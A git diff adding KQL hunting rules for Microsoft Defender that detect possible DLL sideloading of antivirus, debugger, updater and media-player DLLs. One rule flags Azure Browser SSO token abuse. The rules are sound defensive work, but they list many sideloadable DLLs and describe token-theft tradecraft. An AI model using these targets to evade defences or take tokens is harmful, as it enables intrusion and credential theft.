diff --git a/KQL/rules/windows/image_load/potential_antivirus_software_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_antivirus_software_dll_sideloading.kql
new file mode 100644
index 00000000..d29ed7b6
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_antivirus_software_dll_sideloading.kql
@@ -0,0 +1,14 @@
+// Title: Potential Antivirus Software DLL Sideloading
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-08-17
+// Level: medium
+// Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.
+//   - Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file.
+//   - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\log.dll" and (not(((FolderPath in~ ("C:\\Program Files\\AVAST Software\\Avast\\log.dll", "C:\\Program Files (x86)\\AVAST Software\\Avast\\log.dll")) or (FolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\log.dll", "C:\\Program Files (x86)\\AVG\\Antivirus\\log.dll")) or (FolderPath startswith "C:\\Program Files\\Bitdefender Antivirus Free\\" or FolderPath startswith "C:\\Program Files (x86)\\Bitdefender Antivirus Free\\") or FolderPath startswith "C:\\Program Files\\Canon\\MyPrinter\\" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Dell\\SARemediation\\audit\\TelemetryUtility.exe" and (FolderPath in~ ("C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll", "C:\\Program Files\\Dell\\SARemediation\\audit\\log.dll"))))))) or (FolderPath endswith "\\qrt.dll" and (not((FolderPath startswith "C:\\Program Files\\F-Secure\\Anti-Virus\\" or FolderPath startswith "C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\")))) or ((FolderPath endswith "\\ashldres.dll" or FolderPath endswith "\\lockdown.dll" or FolderPath endswith "\\vsodscpl.dll") and (not((FolderPath startswith "C:\\Program Files\\McAfee\\" or FolderPath startswith "C:\\Program Files (x86)\\McAfee\\")))) or (FolderPath endswith "\\vftrace.dll" and (not((FolderPath startswith "C:\\Program Files\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\" or FolderPath startswith "C:\\Program Files (x86)\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\")))) or (FolderPath endswith "\\wsc.dll" and (not(((FolderPath startswith "C:\\program Files\\AVAST Software\\Avast\\" or FolderPath startswith "C:\\program Files (x86)\\AVAST Software\\Avast\\") or (FolderPath startswith "C:\\Program Files\\AVG\\Antivirus\\" or FolderPath startswith "C:\\Program Files (x86)\\AVG\\Antivirus\\"))))) or (FolderPath endswith "\\tmdbglog.dll" and (not((FolderPath startswith "C:\\program Files\\Trend Micro\\Titanium\\" or FolderPath startswith "C:\\program Files (x86)\\Trend Micro\\Titanium\\")))) or (FolderPath endswith "\\DLPPREM32.dll" and (not((FolderPath startswith "C:\\program Files\\ESET" or FolderPath startswith "C:\\program Files (x86)\\ESET"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_appverifui_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_appverifui_dll_sideloading.kql
new file mode 100644
index 00000000..899523fe
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_appverifui_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential appverifUI.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-20
+// Level: high
+// Description: Detects potential DLL sideloading of "appverifUI.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\appverifUI.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\appverif.exe", "C:\\Windows\\System32\\appverif.exe")) and (FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_avkkid_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_avkkid_dll_sideloading.kql
new file mode 100644
index 00000000..ac2e714e
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_avkkid_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Potential AVKkid.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-08-03
+// Level: medium
+// Description: Detects potential DLL sideloading of "AVKkid.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\AVKkid.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\G DATA\\" or FolderPath startswith "C:\\Program Files\\G DATA\\") and (InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\G DATA\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\G DATA\\") and InitiatingProcessFolderPath endswith "\\AVKKid.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_azure_browser_sso_abuse.kql b/KQL/rules/windows/image_load/potential_azure_browser_sso_abuse.kql
new file mode 100644
index 00000000..e1f42f90
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_azure_browser_sso_abuse.kql
@@ -0,0 +1,13 @@
+// Title: Potential Azure Browser SSO Abuse
+// Author: Den Iuzvyk
+// Date: 2020-07-15
+// Level: low
+// Description: Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.
+// An attacker can use this to authenticate to Azure AD in a browser as that user.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - False positives are expected since this rules is only looking for the DLL load event. This rule is better used in correlation with related activity
+
+DeviceImageLoadEvents
+| where FolderPath =~ "C:\\Windows\\System32\\MicrosoftAccountTokenProvider.dll" and (not((InitiatingProcessFolderPath endswith "\\BackgroundTaskHost.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath endswith "\\IDE\\devenv.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_ccleanerdu_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_ccleanerdu_dll_sideloading.kql
new file mode 100644
index 00000000..ba4caee4
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_ccleanerdu_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential CCleanerDU.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-13
+// Level: medium
+// Description: Detects potential DLL sideloading of "CCleanerDU.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - False positives could occur from other custom installation paths. Apply additional filters accordingly.
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\CCleanerDU.dll" and (not(((InitiatingProcessFolderPath endswith "\\CCleaner.exe" or InitiatingProcessFolderPath endswith "\\CCleaner64.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_ccleanerreactivator_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_ccleanerreactivator_dll_sideloading.kql
new file mode 100644
index 00000000..0236ab9d
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_ccleanerreactivator_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential CCleanerReactivator.DLL Sideloading
+// Author: X__Junior
+// Date: 2023-07-13
+// Level: medium
+// Description: Detects potential DLL sideloading of "CCleanerReactivator.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - False positives could occur from other custom installation paths. Apply additional filters accordingly.
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\CCleanerReactivator.dll" and (not((InitiatingProcessFolderPath endswith "\\CCleanerReactivator.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_chrome_frame_helper_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_chrome_frame_helper_dll_sideloading.kql
new file mode 100644
index 00000000..cbfbe203
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_chrome_frame_helper_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Potential Chrome Frame Helper DLL Sideloading
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-08-17
+// Level: medium
+// Description: Detects potential DLL sideloading of "chrome_frame_helper.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\chrome_frame_helper.dll" and (not((FolderPath startswith "C:\\Program Files\\Google\\Chrome\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\Chrome\\Application\\"))) and (not(FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql b/KQL/rules/windows/image_load/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql
new file mode 100644
index 00000000..ab64fcea
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql
@@ -0,0 +1,10 @@
+// Title: Potential DCOM InternetExplorer.Application DLL Hijack - Image Load
+// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
+// Date: 2020-10-12
+// Level: critical
+// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002, attack.t1021.003
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\Internet Explorer\\iertutil.dll" and InitiatingProcessFolderPath endswith "\\Internet Explorer\\iexplore.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbgcore_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbgcore_dll.kql
new file mode 100644
index 00000000..aeecc73e
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbgcore_dll.kql
@@ -0,0 +1,12 @@
+// Title: Potential DLL Sideloading Of DBGCORE.DLL
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-10-25
+// Level: medium
+// Description: Detects DLL sideloading of "dbgcore.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - Legitimate applications loading their own versions of the DLL mentioned in this rule
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\dbgcore.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath contains "opera\\Opera Installer Temp\\opera_package" and FolderPath endswith "\\assistant\\dbgcore.dll") or FolderPath endswith "\\Steam\\bin\\cef\\cef.win7x64\\dbgcore.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbghelp_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbghelp_dll.kql
new file mode 100644
index 00000000..ba5d5ce4
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbghelp_dll.kql
@@ -0,0 +1,12 @@
+// Title: Potential DLL Sideloading Of DBGHELP.DLL
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-10-25
+// Level: medium
+// Description: Detects potential DLL sideloading of "dbghelp.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - Legitimate applications loading their own versions of the DLL mentioned in this rule
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\dbghelp.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\amd64\\dbghelp.dll" or FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\i386\\dbghelp.dll") or (FolderPath endswith "\\Epic Games\\Launcher\\Engine\\Binaries\\ThirdParty\\DbgHelp\\dbghelp.dll" or FolderPath endswith "\\Epic Games\\MagicLegends\\x86\\dbghelp.dll") or (FolderPath contains "opera\\Opera Installer Temp\\opera_package" and FolderPath endswith "\\assistant\\dbghelp.dll"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbgmodel_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbgmodel_dll.kql
new file mode 100644
index 00000000..071a7635
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbgmodel_dll.kql
@@ -0,0 +1,12 @@
+// Title: Potential DLL Sideloading Of DbgModel.DLL
+// Author: Gary Lobermier
+// Date: 2024-07-11
+// Level: medium
+// Description: Detects potential DLL sideloading of "DbgModel.dll"
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+//   - Legitimate applications loading their own versions of the DLL mentioned in this rule
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\dbgmodel.dll" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not((FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.WinDbg_" or (FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\" or FolderPath startswith "C:\\Program Files\\Windows Kits\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql
new file mode 100644
index 00000000..e17f83f8
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: medium
+// Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\libcurl.dll" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\GUP.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_of_mpsvc_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_mpsvc_dll.kql
new file mode 100644
index 00000000..8bcf8538
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_of_mpsvc_dll.kql
@@ -0,0 +1,12 @@
+// Title: Potential DLL Sideloading Of MpSvc.DLL
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema
+// Date: 2024-07-11
+// Level: medium
+// Description: Detects potential DLL sideloading of "MpSvc.dll".
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+//   - Legitimate applications loading their own versions of the DLL mentioned in this rule.
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\MpSvc.dll" and (not((FolderPath startswith "C:\\Program Files\\Windows Defender\\" or FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_of_mscorsvc_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_mscorsvc_dll.kql
new file mode 100644
index 00000000..891cc995
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_of_mscorsvc_dll.kql
@@ -0,0 +1,12 @@
+// Title: Potential DLL Sideloading Of MsCorSvc.DLL
+// Author: Wietze Beukema
+// Date: 2024-07-11
+// Level: medium
+// Description: Detects potential DLL sideloading of "mscorsvc.dll".
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+//   - Legitimate applications loading their own versions of the DLL mentioned in this rule.
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\mscorsvc.dll" and (not((FolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\" or FolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_using_coregen_exe.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_using_coregen_exe.kql
new file mode 100644
index 00000000..fa36580e
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_using_coregen_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential DLL Sideloading Using Coregen.exe
+// Author: frack113
+// Date: 2022-12-31
+// Level: medium
+// Description: Detect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1218, attack.t1055
+
+DeviceImageLoadEvents
+| where InitiatingProcessFolderPath endswith "\\coregen.exe" and (not((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Silverlight\\" or FolderPath startswith "C:\\Program Files\\Microsoft Silverlight\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_via_classicexplorer32_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_via_classicexplorer32_dll.kql
new file mode 100644
index 00000000..44d43c37
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_via_classicexplorer32_dll.kql
@@ -0,0 +1,10 @@
+// Title: Potential DLL Sideloading Via ClassicExplorer32.dll
+// Author: frack113
+// Date: 2022-12-13
+// Level: medium
+// Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\ClassicExplorer32.dll" and (not(FolderPath startswith "C:\\Program Files\\Classic Shell\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_via_comctl32_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_via_comctl32_dll.kql
new file mode 100644
index 00000000..a6545a1b
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_via_comctl32_dll.kql
@@ -0,0 +1,12 @@
+// Title: Potential DLL Sideloading Via comctl32.dll
+// Author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)
+// Date: 2022-12-16
+// Level: high
+// Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local\\" or FolderPath startswith "C:\\windows\\system32\\wermgr.exe.local\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_via_jsschhlp.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_via_jsschhlp.kql
new file mode 100644
index 00000000..da26d015
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_via_jsschhlp.kql
@@ -0,0 +1,10 @@
+// Title: Potential DLL Sideloading Via JsSchHlp
+// Author: frack113
+// Date: 2022-12-14
+// Level: medium
+// Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\JSESPR.dll" and (not(FolderPath startswith "C:\\Program Files\\Common Files\\Justsystem\\JsSchHlp\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_via_vmware_xfer.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_via_vmware_xfer.kql
new file mode 100644
index 00000000..f0e46043
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_via_vmware_xfer.kql
@@ -0,0 +1,12 @@
+// Title: Potential DLL Sideloading Via VMware Xfer
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-02
+// Level: high
+// Description: Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\glib-2.0.dll" and InitiatingProcessFolderPath endswith "\\VMwareXferlogs.exe") and (not(FolderPath startswith "C:\\Program Files\\VMware\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_eacore_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_eacore_dll_sideloading.kql
new file mode 100644
index 00000000..f6502254
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_eacore_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential EACore.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-08-03
+// Level: high
+// Description: Detects potential DLL sideloading of "EACore.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\EACore.dll" and (not((FolderPath startswith "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and (InitiatingProcessFolderPath contains "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and InitiatingProcessFolderPath contains "\\EACoreServer.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_edputil_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_edputil_dll_sideloading.kql
new file mode 100644
index 00000000..4b0af827
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_edputil_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential Edputil.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-09
+// Level: high
+// Description: Detects potential DLL sideloading of "edputil.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\edputil.dll" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_goopdate_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_goopdate_dll_sideloading.kql
new file mode 100644
index 00000000..02fc4958
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_goopdate_dll_sideloading.kql
@@ -0,0 +1,13 @@
+// Title: Potential Goopdate.DLL Sideloading
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: medium
+// Description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - False positives are expected from Google Chrome installations running from user locations (AppData) and other custom locations. Apply additional filters accordingly.
+//   - Other third party chromium browsers located in AppData
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\goopdate.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\"))) and (not((((FolderPath contains "\\AppData\\Local\\Temp\\GUM" and FolderPath contains ".tmp\\goopdate.dll") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\GUM" and InitiatingProcessFolderPath contains ".tmp\\Dropbox")) or ((FolderPath contains "\\AppData\\Local\\Temp\\GUM" or FolderPath contains ":\\Windows\\SystemTemp\\GUM") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\GUM" or InitiatingProcessFolderPath contains ":\\Windows\\SystemTemp\\GUM") and InitiatingProcessFolderPath endswith ".tmp\\GoogleUpdate.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_iviewers_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_iviewers_dll_sideloading.kql
new file mode 100644
index 00000000..e443ad8c
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_iviewers_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Potential Iviewers.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-03-21
+// Level: high
+// Description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\iviewers.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\" or FolderPath startswith "C:\\Program Files\\Windows Kits\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_libvlc_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_libvlc_dll_sideloading.kql
new file mode 100644
index 00000000..4ba1d45e
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_libvlc_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential Libvlc.DLL Sideloading
+// Author: X__Junior
+// Date: 2023-04-17
+// Level: medium
+// Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - False positives are expected if VLC is installed in non-default locations
+
